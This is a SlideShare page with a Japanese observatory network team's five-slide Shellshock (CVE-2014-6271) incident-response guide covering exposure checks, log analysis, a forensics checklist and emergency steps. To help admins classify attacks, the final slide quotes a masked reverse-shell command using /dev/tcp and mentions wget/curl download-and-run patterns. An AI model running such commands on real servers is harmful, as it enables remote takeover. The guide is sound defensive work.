Suche senden
Hochladen
Bash 脆弱性祭から抜け出そう
•
13 gefällt mir
•
3,865 views
Masafumi Oe
Folgen
CVE-2014-6271 shell shock 脆弱性をチェックするための手順書です。NAOJ NOC作成
Weniger lesen
Mehr lesen
Technologie
Melden
Teilen
Melden
Teilen
1 von 5
Jetzt herunterladen
Downloaden Sie, um offline zu lesen
Empfohlen
Python02
Python02
XMLProJ2014
msysgit1.8.0でプロンプトにブランチ名を表示させる
msysgit1.8.0でプロンプトにブランチ名を表示させる
Kenichi Yamada
Word pressのテーマは firephpでハックすれば 良かったのか
Word pressのテーマは firephpでハックすれば 良かったのか
Hisateru Tanaka
Pukiwiki コメントスパム対策 / 電波時計で NTP
Pukiwiki コメントスパム対策 / 電波時計で NTP
Kenichiro MATOHARA
プログラミング作法
プログラミング作法
Kota Uchida
Rustのタスクモデルについて
Rustのタスクモデルについて
zigen
入門:Single / Two Rate Three Color Marker (srTCM / trTCM)
入門:Single / Two Rate Three Color Marker (srTCM / trTCM)
Kentaro Ebisawa
IPv6 /48 Filtering
IPv6 /48 Filtering
RIPE NCC
Empfohlen
Python02
Python02
XMLProJ2014
msysgit1.8.0でプロンプトにブランチ名を表示させる
msysgit1.8.0でプロンプトにブランチ名を表示させる
Kenichi Yamada
Word pressのテーマは firephpでハックすれば 良かったのか
Word pressのテーマは firephpでハックすれば 良かったのか
Hisateru Tanaka
Pukiwiki コメントスパム対策 / 電波時計で NTP
Pukiwiki コメントスパム対策 / 電波時計で NTP
Kenichiro MATOHARA
プログラミング作法
プログラミング作法
Kota Uchida
Rustのタスクモデルについて
Rustのタスクモデルについて
zigen
入門:Single / Two Rate Three Color Marker (srTCM / trTCM)
入門:Single / Two Rate Three Color Marker (srTCM / trTCM)
Kentaro Ebisawa
IPv6 /48 Filtering
IPv6 /48 Filtering
RIPE NCC
Mplsj2013 100 gを使い切るnaoj sdn
Mplsj2013 100 gを使い切るnaoj sdn
Masafumi Oe
Ip qo s functional requirements
Ip qo s functional requirements
wael-b1
Intro to Single / Two Rate Three Color Marker (srTCM / trTCM)
Intro to Single / Two Rate Three Color Marker (srTCM / trTCM)
Kentaro Ebisawa
201406ルーター開発イントロダクション
201406ルーター開発イントロダクション
Masafumi Oe
QoS
QoS
Gopan Govindan
QoS (quality of service)
QoS (quality of service)
Sri Safrina
Quality of Service
Quality of Service
Abhishek Wadhwa
Shell shock事件が明らかにするあなたの組織における情報セキュリティ力
Shell shock事件が明らかにするあなたの組織における情報セキュリティ力
Masafumi Oe
How to install WWLAN card on Thinkpad X1 Carbon
How to install WWLAN card on Thinkpad X1 Carbon
Masafumi Oe
ワイヤレス・ワイヤードにおける広帯域通信 2
ワイヤレス・ワイヤードにおける広帯域通信 2
Masafumi Oe
Overview of Satellite based Internet service and architecture in Japan
Overview of Satellite based Internet service and architecture in Japan
Masafumi Oe
Janog震災時におけるインターネットアクセスの役割
Janog震災時におけるインターネットアクセスの役割
Masafumi Oe
データセンターカンファレンス基調対談_ネットワーク帯域を使いまくる
データセンターカンファレンス基調対談_ネットワーク帯域を使いまくる
Masafumi Oe
Interop 2013 ORC ULTRA200 Project
Interop 2013 ORC ULTRA200 Project
Masafumi Oe
The importance of connecting stability
The importance of connecting stability
Masafumi Oe
Amazon SES を勉強してみる その12024/04/12の勉強会で発表されたものです。
Amazon SES を勉強してみる その12024/04/12の勉強会で発表されたものです。
iPride Co., Ltd.
Postman LT Fukuoka_Quick Prototype_By Daniel
Postman LT Fukuoka_Quick Prototype_By Daniel
danielhu54
20240412_HCCJP での Windows Server 2025 Active Directory
20240412_HCCJP での Windows Server 2025 Active Directory
osamut
新人研修のまとめ 2024/04/12の勉強会で発表されたものです。
新人研修のまとめ 2024/04/12の勉強会で発表されたものです。
iPride Co., Ltd.
PHP-Conference-Odawara-2024-04-000000000
PHP-Conference-Odawara-2024-04-000000000
Shota Ito
プレイマットのパターン生成支援ツールの評価
プレイマットのパターン生成支援ツールの評価
sugiuralab
IoT in the era of generative AI, Thanks IoT ALGYAN.pptx
IoT in the era of generative AI, Thanks IoT ALGYAN.pptx
Atomu Hidaka
Weitere ähnliche Inhalte
Andere mochten auch
Mplsj2013 100 gを使い切るnaoj sdn
Mplsj2013 100 gを使い切るnaoj sdn
Masafumi Oe
Ip qo s functional requirements
Ip qo s functional requirements
wael-b1
Intro to Single / Two Rate Three Color Marker (srTCM / trTCM)
Intro to Single / Two Rate Three Color Marker (srTCM / trTCM)
Kentaro Ebisawa
201406ルーター開発イントロダクション
201406ルーター開発イントロダクション
Masafumi Oe
QoS
QoS
Gopan Govindan
QoS (quality of service)
QoS (quality of service)
Sri Safrina
Quality of Service
Quality of Service
Abhishek Wadhwa
Andere mochten auch
(7)
Mplsj2013 100 gを使い切るnaoj sdn
Mplsj2013 100 gを使い切るnaoj sdn
Ip qo s functional requirements
Ip qo s functional requirements
Intro to Single / Two Rate Three Color Marker (srTCM / trTCM)
Intro to Single / Two Rate Three Color Marker (srTCM / trTCM)
201406ルーター開発イントロダクション
201406ルーター開発イントロダクション
QoS
QoS
QoS (quality of service)
QoS (quality of service)
Quality of Service
Quality of Service
Mehr von Masafumi Oe
Shell shock事件が明らかにするあなたの組織における情報セキュリティ力
Shell shock事件が明らかにするあなたの組織における情報セキュリティ力
Masafumi Oe
How to install WWLAN card on Thinkpad X1 Carbon
How to install WWLAN card on Thinkpad X1 Carbon
Masafumi Oe
ワイヤレス・ワイヤードにおける広帯域通信 2
ワイヤレス・ワイヤードにおける広帯域通信 2
Masafumi Oe
Overview of Satellite based Internet service and architecture in Japan
Overview of Satellite based Internet service and architecture in Japan
Masafumi Oe
Janog震災時におけるインターネットアクセスの役割
Janog震災時におけるインターネットアクセスの役割
Masafumi Oe
データセンターカンファレンス基調対談_ネットワーク帯域を使いまくる
データセンターカンファレンス基調対談_ネットワーク帯域を使いまくる
Masafumi Oe
Interop 2013 ORC ULTRA200 Project
Interop 2013 ORC ULTRA200 Project
Masafumi Oe
The importance of connecting stability
The importance of connecting stability
Masafumi Oe
Mehr von Masafumi Oe
(8)
Shell shock事件が明らかにするあなたの組織における情報セキュリティ力
Shell shock事件が明らかにするあなたの組織における情報セキュリティ力
How to install WWLAN card on Thinkpad X1 Carbon
How to install WWLAN card on Thinkpad X1 Carbon
ワイヤレス・ワイヤードにおける広帯域通信 2
ワイヤレス・ワイヤードにおける広帯域通信 2
Overview of Satellite based Internet service and architecture in Japan
Overview of Satellite based Internet service and architecture in Japan
Janog震災時におけるインターネットアクセスの役割
Janog震災時におけるインターネットアクセスの役割
データセンターカンファレンス基調対談_ネットワーク帯域を使いまくる
データセンターカンファレンス基調対談_ネットワーク帯域を使いまくる
Interop 2013 ORC ULTRA200 Project
Interop 2013 ORC ULTRA200 Project
The importance of connecting stability
The importance of connecting stability
Kürzlich hochgeladen
Amazon SES を勉強してみる その12024/04/12の勉強会で発表されたものです。
Amazon SES を勉強してみる その12024/04/12の勉強会で発表されたものです。
iPride Co., Ltd.
Postman LT Fukuoka_Quick Prototype_By Daniel
Postman LT Fukuoka_Quick Prototype_By Daniel
danielhu54
20240412_HCCJP での Windows Server 2025 Active Directory
20240412_HCCJP での Windows Server 2025 Active Directory
osamut
新人研修のまとめ 2024/04/12の勉強会で発表されたものです。
新人研修のまとめ 2024/04/12の勉強会で発表されたものです。
iPride Co., Ltd.
PHP-Conference-Odawara-2024-04-000000000
PHP-Conference-Odawara-2024-04-000000000
Shota Ito
プレイマットのパターン生成支援ツールの評価
プレイマットのパターン生成支援ツールの評価
sugiuralab
IoT in the era of generative AI, Thanks IoT ALGYAN.pptx
IoT in the era of generative AI, Thanks IoT ALGYAN.pptx
Atomu Hidaka
プレイマットのパターン生成支援ツール
プレイマットのパターン生成支援ツール
sugiuralab
Kürzlich hochgeladen
(8)
Amazon SES を勉強してみる その12024/04/12の勉強会で発表されたものです。
Amazon SES を勉強してみる その12024/04/12の勉強会で発表されたものです。
Postman LT Fukuoka_Quick Prototype_By Daniel
Postman LT Fukuoka_Quick Prototype_By Daniel
20240412_HCCJP での Windows Server 2025 Active Directory
20240412_HCCJP での Windows Server 2025 Active Directory
新人研修のまとめ 2024/04/12の勉強会で発表されたものです。
新人研修のまとめ 2024/04/12の勉強会で発表されたものです。
PHP-Conference-Odawara-2024-04-000000000
PHP-Conference-Odawara-2024-04-000000000
プレイマットのパターン生成支援ツールの評価
プレイマットのパターン生成支援ツールの評価
IoT in the era of generative AI, Thanks IoT ALGYAN.pptx
IoT in the era of generative AI, Thanks IoT ALGYAN.pptx
プレイマットのパターン生成支援ツール
プレイマットのパターン生成支援ツール
Bash 脆弱性祭から抜け出そう
1.
Bash 脆弱性祭から抜け出そう 0)bashが入ってない(/bin/sh=bashである場合あり、sh--version)なら不正アク
セス可能性なし 1)Bashを実行するcgi/ pl/ shといったwebコードがなければ、不正アクセス可能 性なし 2)ある場合 • Cgi/ shが、bashを実行する場合、不正アクセス可能性あり • CentOS/RedHutのように/bin/sh= bash の場合は、shでも不正アクセス可能性あり • Perlは、system() やexec, `(バッククォート)`でシステムシェル(=bash or /bin/sh=bash)が起動する部分があるなら、不正アクセス可能性あり 例)ls–l * みたいなメタ文字 • 無論明示的に、bash(や/bin/sh)を実行したら、アウト • ここまでで、不正アクセス可能性ありの場合は次に進む。 2014/10/3 大江将史 NAOJ NOC / 1
2.
Bash 脆弱性祭から抜け出せない (前提)bash脆弱性により、UserAgentやcookie
経由など、環境変数経由で「任意」のコー ドを実行できる。 • Cookieはアクセスログに残らないので、何をされたかがわからない。 3)2の問題CGI等がアクセスログにてアクセスされてなかったら、不正アクセス可能性なし • ただし、他の脆弱性が放置されていたなら、書き換えされてるかもしれませんので、グレーです。 4)3でアクセスログがある場合、不正アクセス可能性があり、解析必要 • UserAgnetの記録をみて、“不正アクセスの分類”から脅威を把握する • Cookie経由など“なにをしたか”記録が残らない場合もあるので、アクセス元IPアドレスを解析する。 • 他に当該IPから他コンテンツへのアクセスがないなど、通常の利用がない場合は、不正アクセス可能性あり • 実行されたコードが、suexecなど、権限昇格する場合は、[緊急対応]へ 5)不正アクセス可能性ありの場合 不正アクセスされたとしても焦って再起動とかしない。 サーバ解析チェックリストを実行、NOCへ連絡 2014/10/3 大江将史 NAOJ NOC / 2
3.
サーバー解析チェックリスト 1. 全プロセス(ps)とnetstat–naを記録する
2. /tmp/var/tmpなど、apacheの稼働権限で書き込めるディレクトリをコピーするなど、保全する。 3. サーバーのユーザーに対して、注意喚起する。 ssh公開認証の秘密鍵を配置し、パスフレーズがない場合は、特に注意する。 4. Webサーバを一旦停止する 自動起動しないようにする 5. 不審なプロセスと通信のチェック Apache等の稼働権限で動作するプロセスを再度チェックする。 動作してたら、精査、killする前に、次のnetstatチェックをする Netstatで、tcp/udpセッションを確認し、不審な通信がないかどうかをチェックする。 IRCサーバへの通信、バックシェル用途のTCP listen、ESTABLISHEDなTCPセッションをチェック Suexecなど、実行権限の確認 権限がweb serverと異なる場合は、緊急 6. システムを再起動 5の項目を再チェック WEBサーバを再起動して、5の項目を再チェック 4のチェックに問題など発見がなければ、サービスを復旧させ、ユーザーへその旨通知する。 ただし、限りない白に近いグレーな状態であることを理解する。 2014/10/3 大江将史 NAOJ NOC / 3
4.
[緊急対応] 権限昇格のshell実行された •
権限昇格により、パスワードや各ユーザーのファイルなどの奪取やサーバの改ざんされた 可能性がある。 • 初動対応 • NOCへ連絡 • 以下の要点をサーバのアカウントユーザーへ緊急連絡する。 • ホームディレクトリ下のファイルが流失した可能性があること • パスワードやSSHの秘密鍵が流出した可能性があること、パスワード変更、SSH公開鍵を廃棄すること • この間のアクセス中の入出力内容が流出した可能性があること • サーバ全体の正常性が担保できていないこと • 当該サーバと関連するサーバはすべて管理者を除いて、ロックアウトすること。 • 関連サーバのユーザーへも連絡すること。 • 対応 • 作業内容を詳細に逐次記録し、ここまでの経緯も可能な限り記録すること。 • サーバー解析チェックリスト4を実施し、可能な限りプロセスなどを記録・チェックすること。 • サーバを停止し、ディスクを保全すること。 • 関連サーバ上で同様の解析を開始すること。対応困難などなら、関連サーバを停止すること。 2014/10/3 大江将史 NAOJ NOC / 4
5.
Bash 不正アクセスの分類 •
プローブ活動(セーフ) • Ping • Echo • Bash –c id (以下は、脅威となります。) • リバースシェル • Sh–i> & /dev/tcp/****/12345 0>&1 • ダウンロード • wget/ curl/lwp-download • ダウンロード&実行(&消去) • /var/tmp等へwgetして、perlやshellを持ち込んで実行、ついでに消す • IRCへ接続(war等) 各コマンドのアプリケーションが実在するかどうかをチェックする。実在なければ、不正アクセス可能 性は低い。 2014/10/3 大江将史 NAOJ NOC / 5
Jetzt herunterladen